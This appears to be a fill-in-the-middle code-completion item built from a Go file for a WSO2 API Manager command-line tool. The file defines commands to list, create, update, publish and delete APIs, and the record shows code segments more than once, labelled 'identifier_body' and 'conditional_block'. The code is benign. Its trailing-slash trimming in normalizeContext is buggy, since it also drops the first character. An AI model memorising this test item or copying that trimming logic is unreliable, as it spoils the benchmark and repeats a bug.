Name: "definition",
},
cli.StringFlag{
Name: "name",
},
cli.StringFlag{
Name: "context",
},
cli.StringFlag{
Name: "version",
},
cli.StringFlag{
Name: "provider",
},
cli.StringFlag{
Name: "production-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "sandbox-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "gateway-env",
},
cli.BoolFlag{
Name: "publish,P",
},
cli.StringSliceFlag{
Name: "visible-role",
},
}
if update {
commandName = "update"
commandUsage = "Update the API"
commandArgsUsage = "ID"
} else {
commandName = "create"
commandAliases = []string{"new"}
commandUsage = "Create the API"
flags = append(flags, cli.BoolFlag{
Name: "update",
})
}
return cli.Command{
Name: commandName,
Aliases: commandAliases,
Usage: commandUsage,
ArgsUsage: commandArgsUsage,
Flags: flags,
Action: func(ctx *cli.Context) error {
if update {
if ctx.NArg() != 1 {
return errors.New("APIID is required")
}
unmodifiableFlags := []string{"name", "version", "context", "provider", "state"}
for _, f := range unmodifiableFlags {
if ctx.IsSet(f) {
return fmt.Errorf(`"Cannot update %v"`, unmodifiableFlags)
}
}
} else {
if err := c.checkRequiredParameters(ctx, "definition", "name", "context", "version", "production-url", "gateway-env"); err != nil {
return err
}
}
var api *wso2am.APIDetail
if update {
id := ctx.Args().First()
a, err := c.client.API(id)
if err != nil {
return err
}
api = a
} else {
api = c.client.NewAPI()
}
if ctx.IsSet("definition") {
swaggerFile := ctx.String("definition")
def, err := wso2am.NewAPIDefinitionFromFile(swaggerFile)
if err != nil {
return err
}
api.Definition = def
}
if ctx.IsSet("name") {
api.Name = ctx.String("name")
}
if ctx.IsSet("context") {
api.Context = ctx.String("context")
}
if ctx.IsSet("version") {
api.Version = ctx.String("version")
}
if ctx.IsSet("gateway-env") {
api.GatewayEnvironments = ctx.String("gateway-env")
}
if ctx.IsSet("provider") {
api.Provider = ctx.String("provider")
}
if ctx.IsSet("visible-role") {
api.Visibility = wso2am.APIVisibilityRestricted
api.VisibleRoles = ctx.StringSlice("visible-role")
}
// endpoint config
if ctx.IsSet("production-url") || ctx.IsSet("sandbox-url") {
endpointConfig := &wso2am.APIEndpointConfig{
Type: "http",
}
var productionURL = ctx.String("production-url")
var sandboxURL = ctx.String("sandbox-url")
endpointConfig.ProductionEndpoints = &wso2am.APIEndpoint{
URL: productionURL,
}
if sandboxURL != "" {
endpointConfig.SandboxEndpoints = &wso2am.APIEndpoint{
URL: sandboxURL,
}
}
api.SetEndpointConfig(endpointConfig)
}
// if "--update" is specified with create command, find the API ID and update it.
updateOrCreate := ctx.Bool("update")
if updateOrCreate {
// find API ID by context and version
a, err := c.findAPIByContextVersion(api.Context, api.Version)
if err != nil {
return err
}
if a != nil {
api.ID = a.ID
}
}
// call API
var res *wso2am.APIDetail
var err error
if update || (updateOrCreate && api.ID != "") {
res, err = c.client.UpdateAPI(api)
} else {
res, err = c.client.CreateAPI(api)
}
if err != nil {
return err
}
// print the ID of the created API
if !update {
fmt.Println(res.ID)
}
// publish
if ctx.Bool("publish") {
return c.client.ChangeAPIStatus(res.ID, wso2am.APIActionPublish)
}
return nil
},
}
}
func (c *CLI) findAPIByContextVersion(context, version string) (*wso2am.API, error) {
result, err := c.client.SearchResultToSlice(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(fmt.Sprintf("context:%s", context), entryc, errc, done)
})
if err != nil {
return nil, err
}
normalizeContext := func(context string) string {
if strings.HasPrefix(context, "/") {
context = context[1:]
}
if strings.HasSuffix(context, "/") {
context = context[1 : len(context)-1]
}
return context
}
for _, v := range result {
api := c.client.ConvertToAPI(v)
if normalizeContext(api.Context) == normalizeContext(context) && api.Version == version {
return api, nil
}
}
return nil, nil
}
| {
return cli.Command{
Name: "delete",
Aliases: []string{"del", "rm"},
Usage: "Delete the API",
Flags: []cli.Flag{
cli.BoolFlag{
Name: "all,a",
},
cli.BoolFlag{
Name: "force,f",
},
},
ArgsUsage: "ID...",
Action: func(ctx *cli.Context) error {
// define rm func
var errs error
rm := func(id string) {
if err := c.client.DeleteAPI(id); err != nil {
if ctx.Bool("force") {
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionDeprecate); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionRetire); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.DeleteAPI(id); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
} else {
errs = multierror.Append(errs, err)
fmt.Println(err)
}
} else {
fmt.Println(id)
}
}
// delete apis
if ctx.Bool("all") {
var (
apic = make(chan wso2am.API)
errc = make(chan error)
done = make(chan struct{})
)
go func() {
defer func() {
close(apic)
close(errc)
close(done)
}()
c.client.SearchAPIs("", apic, errc, done)
}()
l:
for {
select {
case a, ok := <-apic:
if ok {
rm(a.ID)
} else {
break l
}
case err, ok := <-errc:
if ok {
errs = multierror.Append(errs, err)
} else {
break l
}
}
}
} else {
for _, id := range ctx.Args() {
rm(id)
}
}
return errs
},
}
} | identifier_body |
api.go | package cli
import (
"errors"
"fmt"
"os"
"strings"
multierror "github.com/hashicorp/go-multierror"
wso2am "github.com/uphy/go-wso2am"
"github.com/urfave/cli"
)
func (c *CLI) api() cli.Command {
return cli.Command{
Name: "api",
Aliases: []string{"a"},
Usage: "API management command",
Subcommands: cli.Commands{
c.apiList(),
c.apiChangeStatus(),
c.apiDelete(),
c.apiInspect(),
c.apiSwagger(),
c.apiUpdateSwagger(),
c.apiUploadThumbnail(),
c.apiThumbnail(),
c.apiCreate(true),
c.apiCreate(false),
},
}
}
func (c *CLI) apiList() cli.Command {
trim := func(s string, maxWidth int) string {
s = strings.Replace(s, "\r\n", "\\n", -1)
s = strings.Replace(s, "\n", "\\n", -1)
s = strings.Replace(s, "\r", "\\n", -1)
width := 0
runes := []rune(s)
result := []rune{}
for _, r := range runes {
if r < 0x80 {
width++
} else {
width += 2
}
if width > maxWidth {
break
}
result = append(result, r)
}
return string(result)
}
return cli.Command{
Name: "list",
Aliases: []string{"ls", "dir"},
Usage: "List APIs",
Flags: []cli.Flag{
cli.StringFlag{
Name: "query,q",
Value: "",
},
},
Action: func(ctx *cli.Context) error {
var query = ctx.String("query")
return list(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(query, entryc, errc, done)
}, func(table *TableFormatter) {
table.Header("ID", "Name", "Version", "Description", "Status")
}, func(entry interface{}, table *TableFormatter) {
api := c.client.ConvertToAPI(entry)
table.Row(api.ID, api.Name, api.Version, trim(api.Description, 30), api.Status)
})
},
}
}
func (c *CLI) apiChangeStatus() cli.Command {
return cli.Command{
Name: "change-status",
Usage: "Change API status",
Description: fmt.Sprintf(`Change API status.
Available actions are:
- %s
- %s
- %s
- %s
- %s
- %s
- %s
- %s
`, wso2am.APIActionPublish, wso2am.APIActionDeployAsPrototype, wso2am.APIActionDemoteToCreated, wso2am.APIActionDemoteToPrototyped, wso2am.APIActionBlock, wso2am.APIActionDeprecate, wso2am.APIActionRePublish, wso2am.APIActionRetire),
ArgsUsage: "ID ACTION",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and ACTION are required")
}
id := ctx.Args().Get(0)
action := ctx.Args().Get(1)
return c.client.ChangeAPIStatus(id, wso2am.APIAction(action))
},
}
}
func (c *CLI) apiDelete() cli.Command {
return cli.Command{
Name: "delete",
Aliases: []string{"del", "rm"},
Usage: "Delete the API",
Flags: []cli.Flag{
cli.BoolFlag{
Name: "all,a",
},
cli.BoolFlag{
Name: "force,f",
},
},
ArgsUsage: "ID...",
Action: func(ctx *cli.Context) error {
// define rm func
var errs error
rm := func(id string) {
if err := c.client.DeleteAPI(id); err != nil {
if ctx.Bool("force") {
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionDeprecate); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionRetire); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.DeleteAPI(id); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
} else {
errs = multierror.Append(errs, err)
fmt.Println(err)
}
} else {
fmt.Println(id)
}
}
// delete apis
if ctx.Bool("all") {
var (
apic = make(chan wso2am.API)
errc = make(chan error)
done = make(chan struct{})
)
go func() {
defer func() {
close(apic)
close(errc)
close(done)
}()
c.client.SearchAPIs("", apic, errc, done)
}()
l:
for {
select {
case a, ok := <-apic:
if ok {
rm(a.ID)
} else {
break l
}
case err, ok := <-errc:
if ok {
errs = multierror.Append(errs, err)
} else {
break l
}
}
}
} else {
for _, id := range ctx.Args() {
rm(id)
}
}
return errs
},
}
}
func (c *CLI) apiInspect() cli.Command {
return cli.Command{
Name: "inspect",
Aliases: []string{"show", "cat"},
Usage: "Inspect the API",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
api, err := c.client.API(id)
if err != nil {
return err
}
return c.inspect(api)
},
}
}
func (c *CLI) apiSwagger() cli.Command {
return cli.Command{
Name: "swagger",
Usage: "Inspect the API definition",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
def, err := c.client.APIDefinition(id)
if err != nil {
return err
}
return c.inspect(def)
},
}
}
func (c *CLI) apiUpdateSwagger() cli.Command {
return cli.Command{
Name: "update-swagger",
Usage: "Update the API definition",
ArgsUsage: "ID SWAGGERFILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and SWAGGERFILE are required")
}
id := ctx.Args().Get(0)
def, err := wso2am.NewAPIDefinitionFromFile(ctx.Args().Get(1))
if err != nil {
return err
}
if _, err := c.client.UpdateAPIDefinition(id, def); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiThumbnail() cli.Command {
return cli.Command{
Name: "thumbnail",
Usage: "Download the thumbnail",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
return c.client.Thumbnail(id, os.Stdout)
},
}
}
func (c *CLI) apiUploadThumbnail() cli.Command {
return cli.Command{
Name: "upload-thumbnail",
Usage: "Upload the thumbnail",
ArgsUsage: "ID FILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and FILE are required")
}
id := ctx.Args().Get(0)
file := ctx.Args().Get(1)
f, err := os.Open(file)
if err != nil {
return err
}
defer f.Close()
if _, err := c.client.UploadThumbnail(id, f); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiCreate(update bool) cli.Command {
var commandName string
var commandAliases []string
var commandUsage string
var commandArgsUsage string
flags := []cli.Flag{
cli.StringFlag{
Name: "definition",
},
cli.StringFlag{
Name: "name",
},
cli.StringFlag{
Name: "context",
},
cli.StringFlag{
Name: "version",
},
cli.StringFlag{
Name: "provider",
},
cli.StringFlag{
Name: "production-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "sandbox-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "gateway-env",
},
cli.BoolFlag{
Name: "publish,P",
},
cli.StringSliceFlag{
Name: "visible-role",
},
}
if update {
commandName = "update"
commandUsage = "Update the API"
commandArgsUsage = "ID"
} else {
commandName = "create"
commandAliases = []string{"new"}
commandUsage = "Create the API"
flags = append(flags, cli.BoolFlag{
Name: "update",
})
}
return cli.Command{
Name: commandName,
Aliases: commandAliases,
Usage: commandUsage,
ArgsUsage: commandArgsUsage,
Flags: flags,
Action: func(ctx *cli.Context) error {
if update {
if ctx.NArg() != 1 {
return errors.New("APIID is required")
}
unmodifiableFlags := []string{"name", "version", "context", "provider", "state"}
for _, f := range unmodifiableFlags {
if ctx.IsSet(f) {
return fmt.Errorf(`"Cannot update %v"`, unmodifiableFlags)
}
}
} else {
if err := c.checkRequiredParameters(ctx, "definition", "name", "context", "version", "production-url", "gateway-env"); err != nil {
return err
}
}
var api *wso2am.APIDetail
if update {
id := ctx.Args().First()
a, err := c.client.API(id)
if err != nil {
return err
}
api = a
} else {
api = c.client.NewAPI()
}
if ctx.IsSet("definition") {
swaggerFile := ctx.String("definition")
def, err := wso2am.NewAPIDefinitionFromFile(swaggerFile)
if err != nil {
return err
}
api.Definition = def
}
if ctx.IsSet("name") {
api.Name = ctx.String("name")
}
if ctx.IsSet("context") {
api.Context = ctx.String("context")
}
if ctx.IsSet("version") |
if ctx.IsSet("gateway-env") {
api.GatewayEnvironments = ctx.String("gateway-env")
}
if ctx.IsSet("provider") {
api.Provider = ctx.String("provider")
}
if ctx.IsSet("visible-role") {
api.Visibility = wso2am.APIVisibilityRestricted
api.VisibleRoles = ctx.StringSlice("visible-role")
}
// endpoint config
if ctx.IsSet("production-url") || ctx.IsSet("sandbox-url") {
endpointConfig := &wso2am.APIEndpointConfig{
Type: "http",
}
var productionURL = ctx.String("production-url")
var sandboxURL = ctx.String("sandbox-url")
endpointConfig.ProductionEndpoints = &wso2am.APIEndpoint{
URL: productionURL,
}
if sandboxURL != "" {
endpointConfig.SandboxEndpoints = &wso2am.APIEndpoint{
URL: sandboxURL,
}
}
api.SetEndpointConfig(endpointConfig)
}
// if "--update" is specified with create command, find the API ID and update it.
updateOrCreate := ctx.Bool("update")
if updateOrCreate {
// find API ID by context and version
a, err := c.findAPIByContextVersion(api.Context, api.Version)
if err != nil {
return err
}
if a != nil {
api.ID = a.ID
}
}
// call API
var res *wso2am.APIDetail
var err error
if update || (updateOrCreate && api.ID != "") {
res, err = c.client.UpdateAPI(api)
} else {
res, err = c.client.CreateAPI(api)
}
if err != nil {
return err
}
// print the ID of the created API
if !update {
fmt.Println(res.ID)
}
// publish
if ctx.Bool("publish") {
return c.client.ChangeAPIStatus(res.ID, wso2am.APIActionPublish)
}
return nil
},
}
}
func (c *CLI) findAPIByContextVersion(context, version string) (*wso2am.API, error) {
result, err := c.client.SearchResultToSlice(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(fmt.Sprintf("context:%s", context), entryc, errc, done)
})
if err != nil {
return nil, err
}
normalizeContext := func(context string) string {
if strings.HasPrefix(context, "/") {
context = context[1:]
}
if strings.HasSuffix(context, "/") {
context = context[1 : len(context)-1]
}
return context
}
for _, v := range result {
api := c.client.ConvertToAPI(v)
if normalizeContext(api.Context) == normalizeContext(context) && api.Version == version {
return api, nil
}
}
return nil, nil
}
| {
api.Version = ctx.String("version")
} | conditional_block |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.